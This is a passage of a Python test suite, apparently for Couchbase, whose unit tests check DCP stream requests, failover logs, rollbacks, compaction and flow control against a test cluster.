attempts to retrieve failover log without establishing a connection to
a producer. Expects operation is not supported"""
@unittest.skip("Needs Debug")
def test_get_failover_log_command(self):
response = self.dcp_client.get_failover_log(0)
assert response['status'] == ERR_ECLIENT
"""Request failover log from consumer
attempts to retrieve failover log from a consumer. Expects
operation is not supported."""
def test_get_failover_log_consumer(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.get_failover_log(0)
assert response['status'] == ERR_ECLIENT
"""Request failover log from producer
retrieve failover log from a producer. Expects to successfully receive
failover log and for it to match dcp stats."""
def test_get_failover_log_producer(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.get_failover_log(0)
assert response['status'] == SUCCESS
response = self.mcd_client.stats('failovers')
assert response['vb_0:0:seq'] == '0'
"""Request failover log from invalid vbucket
retrieve failover log from invalid vbucket. Expects to not_my_vbucket from producer."""
def test_get_failover_invalid_vbucket(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.get_failover_log(1025)
assert response['status'] == ERR_NOT_MY_VBUCKET
"""Failover log during stream request
Open a producer connection and send a stream request with a high end_seqno.
While waiting for the end_seqno to be reached, send a request for the failover log
and expect that the producer is still able to return the failover log
while the stream request is still open.
"""
def test_failover_log_during_stream_request(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
stream = self.dcp_client.stream_req(0, 0, 0, 100, 0)
seqno = stream.failover_log[0][1]
response = self.dcp_client.get_failover_log(0)
assert response['status'] == SUCCESS
assert response['value'][0][1] == seqno
"""Failover log with ops
Open a producer connection to a vbucket and start loading data to node.
After the expected number of items have been created, send a request for the failover
log and expect its seqno to match the value captured from the initial stream request.
"""
@unittest.skip("needs debug")
def test_failover_log_with_ops(self):
stream = "mystream"
response = self.dcp_client.open_producer(stream)
assert response['status'] == SUCCESS
stream = self.dcp_client.stream_req(0, 0, 0, 100, 0)
assert stream.status == SUCCESS
seqno = stream.failover_log[0][1]
for i in range(100):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
resp = stream.next_response()
assert resp
if (i % 10) == 0:
fail_response = self.dcp_client.get_failover_log(0)
assert fail_response['status'] == SUCCESS
assert fail_response['value'][0][1] == seqno
self.verification_seqno = 100
"""Request failover from n producers from n vbuckets
Open n producers and attempt to fetch failover log for n vbuckets on each producer.
Expects all requests for failover log to succeed and that the log for
similar buckets match.
"""
def test_failover_log_n_producers_n_vbuckets(self):
n = 2
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
vb_ids = self.all_vbucket_ids()
expected_seqnos = {}
for id_ in vb_ids:
# print 'id', id_
response = self.dcp_client.get_failover_log(id_)
expected_seqnos[id_] = response['value'][0][0]
# open n producers for this vbucket
for i in range(n):
stream = "mystream{0}".format(i)
conn = DcpClient(self.cluster.master.ip, self.cluster.master.port)
# print 'conn', conn
response = conn.open_producer(stream)
vbucket_id = id_
# print 'vbucket_id',vbucket_id
response = self.dcp_client.get_failover_log(vbucket_id)
assert response['value'][0][0] == expected_seqnos[vbucket_id]
"""Basic dcp stream request
Opens a producer connection and sends a stream request command for
vbucket 0. Since no items exist in the server we should accept the
stream request and then send back a stream end message."""
def test_stream_request_command(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
stream = self.dcp_client.stream_req(0, 0, 0, 0, 0, 0)
assert stream.opcode == CMD_STREAM_REQ
end = stream.next_response()
assert end and end['opcode'] == CMD_STREAM_END
"""Stream request with invalid vbucket
Opens a producer connection and then tries to create a stream with an
invalid VBucket. Should get a not my vbucket error."""
def test_stream_request_invalid_vbucket(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.stream_req(1025, 0, 0, MAX_SEQNO, 0, 0)
assert response.status == ERR_NOT_MY_VBUCKET
response = self.mcd_client.stats('dcp')
assert 'eq_dcpq:mystream:stream_0_opaque' not in response
assert response['eq_dcpq:mystream:type'] == 'producer'
"""Stream request for invalid connection
Try to create a stream over a non-dcp connection. The server should
disconnect from the client"""
@unittest.skip("Needs Debug")
def test_stream_request_invalid_connection(self):
response = self.dcp_client.stream_req(0, 0, 0, MAX_SEQNO, 0, 0)
assert response.status == ERR_ECLIENT
response = self.mcd_client.stats('dcp')
assert 'eq_dcpq:mystream:type' not in response
"""Stream request for consumer connection
Try to create a stream on a consumer connection. The server should
disconnect from the client"""
def test_stream_request_consumer_connection(self):
response = self.dcp_client.open_consumer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.stream_req(0, 0, 0, MAX_SEQNO, 0)
assert response.status == ERR_ECLIENT
response = self.mcd_client.stats('dcp')
assert 'eq_dcpq:mystream:type' not in response
"""Stream request with start seqno bigger than end seqno
Opens a producer connection and then tries to create a stream with a start
seqno that is bigger than the end seqno. The stream should be closed with a
range error. Currently the server may return a client error instead, which is still acceptable."""
def test_stream_request_start_seqno_bigger_than_end_seqno(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.stream_req(0, 0, MAX_SEQNO, MAX_SEQNO / 2, 0, 0)
assert response.status == ERR_ECLIENT or response.status == ERR_ERANGE
response = self.mcd_client.stats('dcp')
assert 'eq_dcpq:mystream:stream_0_opaque' not in response
# dontassert response['eq_dcpq:mystream:type'] == 'producer'
"""Stream requests from the same vbucket
Opens a stream request for a vbucket to read up to seq 100. Then sends another
stream request for the same vbucket. Expect a EXISTS error and dcp stats
should refer to initial created stream."""
def test_stream_from_same_vbucket(self):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
response = self.dcp_client.stream_req(0, 0, 0, MAX_SEQNO, 0)
assert response.status == SUCCESS
response = self.mcd_client.stats('dcp')
assert response['eq_dcpq:mystream:type'] == 'producer'
created = response['eq_dcpq:mystream:created']
assert created >= 0
response = self.dcp_client.stream_req(0, 0, 0, 100, 0)
assert response.status == ERR_KEY_EEXISTS
response = self.mcd_client.stats('dcp')
assert response['eq_dcpq:mystream:created'] == created
"""Basic dcp stream request (Receives mutations)
Stores 10 items into vbucket 0 and then creates an dcp stream to
retrieve those items in order of sequence number.
"""
def test_stream_request_with_ops(self):
# self.mcd_client.stop_persistence()
doc_count = snap_end_seqno = 10
for i in range(doc_count):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
mutations = 0
last_by_seqno = 0
stream = self.dcp_client.stream_req(0, 0, 0, doc_count, 0, 0)
assert stream.status == SUCCESS
stream.run()
self.wait_for_persistence(self.mcd_client)
assert stream.last_by_seqno == doc_count
self.verification_seqno = doc_count
"""Receive mutation from dcp stream from a later sequence
Stores 10 items into vbucket 0 and then creates an dcp stream to
retrieve items from sequence number 7 up to 10 (3 mutations).
"""
def test_stream_request_with_ops_start_sequence(self):
# self.mcd_client.stop_persistence()
for i in range(10):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
resp = self.mcd_client.stats('vbucket-seqno')
end_seqno = int(resp['vb_0:high_seqno'])
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
high_seqno = long(resp['vb_0:0:seq'])
start_seqno = 7
stream = self.dcp_client.stream_req(
0, 0, start_seqno, end_seqno, vb_uuid)
assert stream.status == SUCCESS
responses = stream.run()
mutations = \
len(filter(lambda r: r['opcode'] == CMD_MUTATION, responses))
assert stream.last_by_seqno == 10
assert mutations == 3
self.verification_seqno = 10
def set_keys_with_timestamp(self, count):
for i in range(count):
self.mcd_client.set('key' + str(i), 0, 0, str(time.time()), 0)
self.sleep(0.010)
""" Concurrent set keys and stream them. Verify that the time between new arrivals
is not greater than 10 seconds
"""
def test_mutate_stream_request_concurrent_with_ops(self): # ******
doc_count = snap_end_seqno = 10000
t = Thread(target=self.set_keys_with_timestamp, args=(doc_count,))
t.start()
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
mutations = 0
last_by_seqno = 0
stream = self.dcp_client.stream_req(0, 0, 0, doc_count, 0, 0)
assert stream.status == SUCCESS
results = stream.run()
# remove response like this
# {'snap_end_seqno': 30, 'arrival_time': 1423699992.195518, 'flag': 'memory', 'opcode': 86, 'snap_start_seqno': 30, 'vbucket': 0}
resultsWithoutSnap = [x for x in results if 'key' in x]
pauses = []
i = 1
while i < len(resultsWithoutSnap):
if resultsWithoutSnap[i]['arrival_time'] - resultsWithoutSnap[i - 1]['arrival_time'] > 10:
pauses.append('Key {0} set at {1} was streamed {2:.2f} seconds after the previous key was received. '.
format(resultsWithoutSnap[i]['key'],
datetime.fromtimestamp(
float(resultsWithoutSnap[i - 1]['value'])).strftime('%H:%M:%S'),
resultsWithoutSnap[i]['arrival_time'] - resultsWithoutSnap[i - 1]['arrival_time'],
datetime.fromtimestamp(
float(resultsWithoutSnap[i - 1]['value'])).strftime('%H:%M:%S')))
i = i + 1
# print 'Number of pause delays:', len(pauses)
if len(pauses) > 0:
if len(pauses) < 20: # keep the output manageable
for i in pauses:
print(i)
else:
for i in range(20):
print(pauses[i])
assert False, 'There were pauses greater than 10 seconds in receiving stream contents'
assert stream.last_by_seqno == doc_count
"""Basic dcp stream request (Receives mutations/deletions)
Stores 10 items into vbucket 0 and then deletes 5 of those items. After
the items have been inserted/deleted from the server we create an dcp
stream to retrieve those items in order of sequence number.
"""
def test_stream_request_with_deletes(self):
# self.mcd_client.stop_persistence()
for i in range(10):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
for i in range(5):
self.mcd_client.delete('key' + str(i), 0, 0)
resp = self.mcd_client.stats('vbucket-seqno')
end_seqno = int(resp['vb_0:high_seqno'])
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
last_by_seqno = 0
stream = self.dcp_client.stream_req(0, 0, 0, end_seqno, 0)
assert stream.status == SUCCESS
responses = stream.run()
mutations = \
len(filter(lambda r: r['opcode'] == CMD_MUTATION, responses))
deletions = \
len(filter(lambda r: r['opcode'] == CMD_DELETION, responses))
assert mutations == 5
assert deletions == 5
assert stream.last_by_seqno == 15
self.verification_seqno = 15
"""
MB-13386 - delete and compaction
Stores 10 items into vbucket 0 and then deletes 5 of those items. After
the items have been inserted/deleted from the server we create an dcp
stream to retrieve those items in order of sequence number.
"""
def test_stream_request_with_deletes_and_compaction(self):
for i in range(1, 4):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
self.sleep(2)
for i in range(2, 4):
self.mcd_client.delete('key' + str(i), 0, 0)
self.sleep(2)
resp = self.mcd_client.stats('vbucket-seqno')
end_seqno = int(resp['vb_0:high_seqno'])
self.wait_for_persistence(self.mcd_client)
# drop deletes is important for this scenario
self.mcd_client.compact_db('', 0, 2, 5, 1) # key, bucket, purge_before_ts, purge_before_seq, drop_deletes
# wait for compaction to end - if this were a rest call then we could use active tasks but
# as this is an mc bin client call the only way known (to me) is to sleep
self.sleep(20)
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
last_by_seqno = 0
self.sleep(5)
stream = self.dcp_client.stream_req(0, 0, 0, end_seqno, 0)
assert stream.status == SUCCESS
responses = stream.run()
print("responses {0}".format(responses))
mutations = \
len(filter(lambda r: r['opcode'] == CMD_MUTATION, responses))
deletions = \
len(filter(lambda r: r['opcode'] == CMD_DELETION, responses))
assert deletions == 1, 'Deletion mismatch, expect {0}, actual {1}'.format(2, deletions)
assert mutations == 1, 'Mutation mismatch, expect {0}, actual {1}'.format(1, mutations)
assert stream.last_by_seqno == 5
"""
MB-13479 - dedup and compaction
Set some keys
Consumer consumes them
Delete one of the set keys
Compaction - dedup occurs
Request more of the stream - there should be a rollback so that the consumer does not bridge the dedup
"""
def test_stream_request_with_dedup_and_compaction(self):
KEY_BASE = 'key'
for i in range(1, 4):
self.mcd_client.set(KEY_BASE + str(i), 0, 0, 'value', 0)
self.sleep(2)
resp = self.mcd_client.stats('vbucket-seqno')
end_seqno = int(resp['vb_0:high_seqno'])
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
# consume the first 3 keys
stream = self.dcp_client.stream_req(0, 0, 0, 3, 0)
assert stream.status == SUCCESS
responses = stream.run()
# and delete one from the original batch
for i in range(2, 4):
self.mcd_client.delete(KEY_BASE + str(i), 0, 0)
# set a couple more keys
self.mcd_client.set(KEY_BASE + str(5), 0, 0, 'value', 0)
self.mcd_client.set(KEY_BASE + str(5), 0, 0, 'value', 0)
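# 'key5' is written twice, so its first revision is de-duplicated; after compaction
# purges that history, the later stream request below is expected to get a rollback.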
self.mcd_client.compact_db('', 0, 3, 5, 1) # key, bucket, ...
self.sleep(10)
# and now get the stream
# def stream_req(self, vbucket, takeover, start_seqno, end_seqno,
# vb_uuid, snap_start = None, snap_end = None):
stream = self.dcp_client.stream_req(0, 0, 3, 6, 0)
assert stream.status == ERR_ROLLBACK
@unittest.skip("Broken: needs debugging")
def test_stream_request_backfill_deleted(self):
""" verify deleted mutations can be streamed after backfill
task has occurred """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
# set 6 items and delete the first 2
self.mcd_client.set('key1', 0, 0, 'value', 0)
self.mcd_client.set('key2', 0, 0, 'value', 0)
self.mcd_client.set('key3', 0, 0, 'value', 0)
self.mcd_client.set('key4', 0, 0, 'value', 0)
self.mcd_client.set('key5', 0, 0, 'value', 0)
self.mcd_client.set('key6', 0, 0, 'value', 0)
self.wait_for_persistence(self.mcd_client)
self.mcd_client.delete('key1', 0, 0)
self.mcd_client.delete('key2', 0, 0)
backfilling = False
tries = 10
while not backfilling and tries > 0:
# stream request until backfilling occurs
self.dcp_client.stream_req(0, 0, 0, 5,
vb_uuid)
stats = self.mcd_client.stats('dcp')
num_backfilled = \
int(stats['eq_dcpq:mystream:stream_0_backfilled'])
backfilling = num_backfilled > 0
tries -= 1
self.sleep(2)
assert backfilling, "ERROR: backfill task did not start"
# attempt to stream deleted mutations
stream = self.dcp_client.stream_req(0, 0, 0, 3, vb_uuid)
response = stream.next_response()
""" Stream request with incremental mutations
Insert some ops and then create a stream that wants to get more mutations
than there are ops. The stream should pause after it gets the first set.
Then add some more ops and wait for them to be streamed out. We will insert
the exact number of items that should be streamed out."""
def test_stream_request_incremental(self):
for i in range(10):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
stream = self.dcp_client.stream_req(0, 0, 0, 20, 0)
assert stream.status == SUCCESS
stream.run(10)
assert stream.last_by_seqno == 10
for i in range(10):
self.mcd_client.set('key' + str(i + 10), 0, 0, 'value', 0)
# read remaining mutations
stream.run()
assert stream.last_by_seqno == 20
self.verification_seqno = 20
"""Send stream requests for multiple
Put some operations into four different vbucket. Then get the end sequence
number for each vbucket and create a stream to it. Read all of the mutations
from the streams and make sure they are all sent."""
def test_stream_request_multiple_vbuckets(self):
num_vbs = 4
num_ops = 10
for vb in range(num_vbs):
for i in range(num_ops):
self.mcd_client.set('key' + str(i), 0, 0, 'value', vb)
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
streams = {}
stats = self.mcd_client.stats('vbucket-seqno')
for vb in range(4):
en = int(stats['vb_%d:high_seqno' % vb])
stream = self.dcp_client.stream_req(vb, 0, 0, en, 0)
streams[vb] = {'stream': stream,
'mutations': 0,
'last_seqno': 0}
while len(streams) > 0:
for vb in streams.keys():
if streams[vb]['stream'].has_response():
response = streams[vb]['stream'].next_response()
if response['opcode'] == 87:  # 87 == CMD_MUTATION
assert response['by_seqno'] > streams[vb]['last_seqno']
streams[vb]['last_seqno'] = response['by_seqno']
streams[vb]['mutations'] = streams[vb]['mutations'] + 1
else:
assert streams[vb]['mutations'] == num_ops
del streams[vb]
"""
Sends a stream request with start seqno greater than seqno of vbucket. Expects
to receive a rollback response with seqno to roll back to
"""
@unittest.skip("Needs Debug")
def test_stream_request_rollback(self):
response = self.dcp_client.open_producer("rollback")
assert response['status'] == SUCCESS
self.mcd_client.set('key1', 0, 0, 'value', 0)
self.mcd_client.set('key2', 0, 0, 'value', 0)
vb_id = 'vb_0'
vb_stats = self.mcd_client.stats('vbucket-seqno')
fl_stats = self.mcd_client.stats('failovers')
fail_seqno = long(fl_stats[vb_id + ':0:seq'])
vb_uuid = long(vb_stats[vb_id + ':uuid'])
rollback = long(vb_stats[vb_id + ':high_seqno'])
start_seqno = end_seqno = 3
stream = self.dcp_client.stream_req(0, 0, start_seqno, end_seqno, vb_uuid)
assert stream.status == ERR_ROLLBACK
assert stream.rollback == rollback
assert stream.rollback_seqno == fail_seqno
start_seqno = end_seqno = rollback
stream = self.dcp_client.stream_req(0, 0, start_seqno - 1, end_seqno, vb_uuid)
stream.run()
assert end_seqno == stream.last_by_seqno
self.verification_seqno = end_seqno
"""
Sends a stream request with start seqno greater than seqno of vbucket. Expects
to receive a rollback response with seqno to roll back to. Instead of rolling back
resend the stream request n times, each with a higher seqno, and expect a rollback for each attempt.
"""
@unittest.skip("Needs Debug")
def test_stream_request_n_rollbacks(self):
response = self.dcp_client.open_producer("rollback")
assert response['status'] == SUCCESS
vb_stats = self.mcd_client.stats('vbucket-seqno')
vb_uuid = long(vb_stats['vb_0:uuid'])
for n in range(1000):
self.mcd_client.set('key1', 0, 0, 'value', 0)
by_seqno = n + 1
stream = self.dcp_client.stream_req(0, 0, by_seqno + 1, by_seqno + 2, vb_uuid)
assert stream.status == ERR_ROLLBACK
assert stream.rollback_seqno == 0
"""
Send stream request command from n producers for the same vbucket. Expect each request
to succeed for each producer and verify that expected number of mutations are received
for each request.
"""
def test_stream_request_n_producers(self):
clients = []
for n in range(10):
client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
op = client.open_producer("producer:%s" % n)
assert op['status'] == SUCCESS
clients.append(client)
for n in range(1, 10):
self.mcd_client.set('key%s' % n, 0, 0, 'value', 0)
for client in clients:
stream = client.stream_req(0, 0, 0, n, 0)
# should never get rollback
assert stream.status == SUCCESS, stream.status
stream.run()
# stream changes and we should reach last seqno
assert stream.last_by_seqno == n, \
"%s != %s" % (stream.last_by_seqno, n)
self.verification_seqno = stream.last_by_seqno
[client.close() for client in clients]
def test_stream_request_needs_rollback(self):
# load docs
self.mcd_client.set('key1', 0, 0, 'value', 0)
self.mcd_client.set('key2', 0, 0, 'value', 0)
self.mcd_client.set('key3', 0, 0, 'value', 0)
# failover uuid
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
# vb_uuid does not exist
self.dcp_client.open_producer("rollback")
resp = self.dcp_client.stream_req(0, 0, 1, 3, 0, 1, 1)
assert resp and resp.status == ERR_ROLLBACK
assert resp and resp.rollback == 0
# snap_end > by_seqno
resp = self.dcp_client.stream_req(0, 0, 1, 3, vb_uuid, 1, 4)
assert resp and resp.status == SUCCESS, resp.status
# snap_start > by_seqno
resp = self.dcp_client.stream_req(0, 0, 4, 4, vb_uuid, 4, 4)
assert resp and resp.status == ERR_ROLLBACK, resp.status
assert resp and resp.rollback == 3, resp.rollback
# fallthrough
resp = self.dcp_client.stream_req(0, 0, 7, 7, vb_uuid, 2, 7)
assert resp and resp.status == ERR_ROLLBACK, resp.status
assert resp and resp.rollback == 3, resp.rollback
def test_stream_request_after_close(self):
"""
Load items from producer then close producer and attempt to resume stream request
"""
doc_count = 100
self.dcp_client.open_producer("mystream")
for i in xrange(doc_count):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
self.sleep(2)
self.wait_for_persistence(self.mcd_client)
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
stream = self.dcp_client.stream_req(0, 0, 0, doc_count,
vb_uuid)
stream.run(doc_count / 2)
self.dcp_client.close()
self.dcp_client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
self.dcp_client.open_producer("mystream")
stream = self.dcp_client.stream_req(0, 0, stream.last_by_seqno,
doc_count, vb_uuid)
while stream.has_response():
response = stream.next_response()
if response['opcode'] == CMD_MUTATION:
# first mutation should be at location we left off
assert response['key'] == 'key' + str(doc_count / 2)
break
def test_stream_request_notifier(self):
"""Open a notifier consumer and verify mutations are ready
to be streamed"""
doc_count = 100
response = self.dcp_client.open_notifier("notifier")
assert response['status'] == SUCCESS
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
notifier_stream = \
self.dcp_client.stream_req(0, 0, doc_count - 1, 0, vb_uuid)
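# On a notifier connection the stream simply signals (via CMD_STREAM_END below)
# once the vbucket's seqno passes the requested start seqno.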
for i in range(doc_count):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
response = notifier_stream.next_response()
assert response['opcode'] == CMD_STREAM_END
self.dcp_client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
response = self.dcp_client.open_producer("producer")
assert response['status'] == SUCCESS
stream = self.dcp_client.stream_req(0, 0, 0, doc_count, 0)
assert stream.status == SUCCESS
stream.run()
assert stream.last_by_seqno == doc_count
self.verification_seqno = doc_count
def test_stream_request_notifier_bad_uuid(self):
"""Wait for mutations from missing vb_uuid"""
response = self.dcp_client.open_notifier("notifier")
assert response['status'] == SUCCESS
# set 1
self.mcd_client.set('key', 0, 0, 'value', 0)
# create notifier stream with vb_uuid that doesn't exist
# expect rollback since this value can never be reached
vb_uuid = 0
stream = self.dcp_client.stream_req(0, 0, 1, 0, 0)
assert stream.status == ERR_ROLLBACK, \
"ERROR: response expected = %s, received = %s" % \
(ERR_ROLLBACK, stream.status)
def test_stream_request_append(self):
""" stream appended mutations """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.set('key', 0, 0, val, 0)
for i in range(100):
self.mcd_client.append('key', str(i), 0, 0)
val += str(i)
self.sleep(1)
stream = self.dcp_client.stream_req(0, 0, 0, 100, 0)
assert stream.status == SUCCESS
responses = stream.run()
assert stream.last_by_seqno == 101
assert responses[1]['value'] == val
self.verification_seqno = 101
def test_stream_request_prepend(self):
""" stream prepended mutations """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.set('key', 0, 0, val, 0)
for i in range(100):
self.mcd_client.prepend('key', str(i), 0, 0)
val = str(i) + val
self.sleep(1)
stream = self.dcp_client.stream_req(0, 0, 0, 100, 0)
assert stream.status == SUCCESS
responses = stream.run()
assert stream.last_by_seqno == 101
assert responses[1]['value'] == val
self.verification_seqno = 101
def test_stream_request_incr(self):
""" stream mutations created by incr command """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.incr('key', init=0, vbucket=0)
for i in range(100):
self.mcd_client.incr('key', amt=2, vbucket=0)
self.sleep(1)
stream = self.dcp_client.stream_req(0, 0, 0, 100, 0)
assert stream.status == SUCCESS
responses = stream.run()
assert stream.last_by_seqno == 101
assert responses[1]['value'] == '200'
self.verification_seqno = 101
def test_stream_request_decr(self):
""" stream mutations created by decr command """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.decr('key', init=200, vbucket=0)
for i in range(100):
self.mcd_client.decr('key', amt=2, vbucket=0)
self.sleep(1)
stream = self.dcp_client.stream_req(0, 0, 0, 100, 0)
assert stream.status == SUCCESS
responses = stream.run()
assert stream.last_by_seqno == 101
assert responses[1]['value'] == '0'
self.verification_seqno = 101
def test_stream_request_replace(self):
""" stream mutations created by replace command """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.set('key', 0, 0, 'value', 0)
for i in range(100):
self.mcd_client.replace('key', 0, 0, 'value' + str(i), 0)
self.sleep(1)
stream = self.dcp_client.stream_req(0, 0, 0, 100, 0)
assert stream.status == SUCCESS
responses = stream.run()
assert stream.last_by_seqno == 101
assert responses[1]['value'] == 'value99'
self.verification_seqno = 101
@unittest.skip("needs debug")
def test_stream_request_touch(self):
""" stream mutations created by touch command """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.set('key', 100, 0, 'value', 0)
self.mcd_client.touch('key', 1, 0)
stream = self.dcp_client.stream_req(0, 0, 0, 2, 0)
assert stream.status == SUCCESS
responses = stream.run()
assert stream.last_by_seqno == 2
assert int(responses[1]['expiration']) > 0
self.wait_for_persistence(self.mcd_client)
stats = self.mcd_client.stats()
num_expired = stats['vb_active_expired']
if num_expired == 0:
self.verification_seqno = 2
else:
assert num_expired == 1
self.verification_seqno = 3
def test_stream_request_gat(self):
""" stream mutations created by get-and-touch command """
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
val = 'base-'
self.mcd_client.set('key', 100, 0, 'value', 0)
self.mcd_client.gat('key', 1, 0)
stream = self.dcp_client.stream_req(0, 0, 0, 2, 0)
assert stream.status == SUCCESS
responses = stream.run()
assert stream.last_by_seqno == 2
assert int(responses[1]['expiration']) > 0
self.wait_for_persistence(self.mcd_client)
stats = self.mcd_client.stats()
num_expired = int(stats['vb_active_expired'])
if num_expired == 0:
self.verification_seqno = 2
else:
assert num_expired == 1
self.verification_seqno = 3
def test_stream_request_client_per_vb(self):
""" stream request muataions from each vbucket with a new client """
for vb in xrange(8):
for i in range(1000):
self.mcd_client.set('key' + str(i), 0, 0, 'value', vb)
num_vbs = len(self.all_vbucket_ids())
for vb in xrange(8):
dcp_client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
dcp_client.open_producer("producerstream")
stream = dcp_client.stream_req(
vb, 0, 0, 1000, 0)
mutations = stream.run()
try:
assert stream.last_by_seqno == 1000, stream.last_by_seqno
self.verification_seqno = 1000
finally:
dcp_client.close()
def test_stream_request_mutation_with_flags(self):
self.dcp_client.open_producer("mystream")
self.mcd_client.set('key', 0, 2, 'value', 0)
stream = self.dcp_client.stream_req(0, 0, 0, 1, 0)
snap = stream.next_response()
res = stream.next_response()
item = self.mcd_client.get('key', 0)
assert res['flags'] == 2
assert item[0] == 2
@unittest.skip("Needs Debug")
def test_flow_control(self):
""" verify flow control of a 128 byte buffer stream """
response = self.dcp_client.open_producer("flowctl")
assert response['status'] == SUCCESS
buffsize = 128
response = self.dcp_client.flow_control(buffsize)
assert response['status'] == SUCCESS
for i in range(5):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
stream = self.dcp_client.stream_req(0, 0, 0, 5, 0)
required_ack = False
while stream.has_response():
resp = stream.next_response()
if resp is None:
ack = self.dcp_client.ack(buffsize)
assert ack is None, ack['error']
required_ack = True
assert stream.last_by_seqno == 5
assert required_ack, "received non flow-controlled stream"
self.verification_seqno = 5
" MB-15213 buffer size of zero means no flow control"
def test_flow_control_buffer_size_zero(self):
""" verify no flow control for a 0 byte buffer stream """
response = self.dcp_client.open_producer("flowctl")
assert response['status'] == SUCCESS
buffsize = 0
response = self.dcp_client.flow_control(buffsize)
assert response['status'] == SUCCESS
for i in range(5):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
stream = self.dcp_client.stream_req(0, 0, 0, 5, 0)
required_ack = False
# consume the stream
while stream.has_response():
resp = stream.next_response()
assert stream.last_by_seqno == 5
@unittest.skip("Needs Debug")
def test_flow_control_stats(self):
""" verify flow control stats """
buffsize = 128
self.dcp_client.open_producer("flowctl")
self.dcp_client.flow_control(buffsize)
self.mcd_client.set('key1', 0, 0, 'valuevaluevalue', 0)
self.mcd_client.set('key2', 0, 0, 'valuevaluevalue', 0)
self.mcd_client.set('key3', 0, 0, 'valuevaluevalue', 0)
def info():
stats = self.mcd_client.stats('dcp')
acked = stats['eq_dcpq:flowctl:total_acked_bytes']
unacked = stats['eq_dcpq:flowctl:unacked_bytes']
sent = stats['eq_dcpq:flowctl:total_bytes_sent']
return int(acked), int(sent), int(unacked)
# all stats 0
assert all(map(lambda x: x == 0, info()))
stream = self.dcp_client.stream_req(0, 0, 0, 3, 0)
self.sleep(10) # give time for the stats to settle
acked, sent, unacked = info()
assert acked == 0
if unacked != sent:
print "test_flow_control_stats unacked %d sent %d" % (unacked, sent)
self.log.info("test_flow_control_stats unacked %d sent %d" % (unacked, sent))
assert unacked == sent
# ack received bytes
last_acked = acked
while unacked > 0:
ack = self.dcp_client.ack(buffsize)
acked, sent, unacked = info()
assert acked == last_acked + buffsize
last_acked = acked
stream.run()
assert stream.last_by_seqno == 3
self.verification_seqno = 3
@unittest.skip("Needs Debug")
def test_flow_control_stream_closed(self):
""" close and reopen stream during with flow controlled client"""
response = self.dcp_client.open_producer("flowctl")
assert response['status'] == SUCCESS
buffsize = 128
response = self.dcp_client.flow_control(buffsize)
assert response['status'] == SUCCESS
end_seqno = 5
for i in range(end_seqno):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
resp = self.mcd_client.stats('failovers')
vb_uuid = long(resp['vb_0:0:id'])
stream = self.dcp_client.stream_req(0, 0, 0, end_seqno, vb_uuid)
max_timeouts = 10
required_ack = False
last_seqno = 0
while stream.has_response() and max_timeouts > 0:
resp = stream.next_response()
if resp is None:
# close
self.dcp_client.close_stream(0)
# ack
ack = self.dcp_client.ack(buffsize)
assert ack is None, ack['error']
required_ack = True
# new stream
stream = self.dcp_client.stream_req(0, 0, last_seqno,
end_seqno, vb_uuid)
assert stream.status == SUCCESS, \
"Re-open Stream failed"
max_timeouts -= 1
elif resp['opcode'] == CMD_MUTATION:
last_seqno += 1
# verify stream closed
assert last_seqno == end_seqno, "Got %s" % last_seqno
assert required_ack, "received non flow-controlled stream"
self.verification_seqno = end_seqno
def test_flow_control_reset_producer(self):
""" recreate producer with various values max_buffer bytes """
sizes = [64, 29, 64, 777, 32, 128, 16, 24, 29, 64]
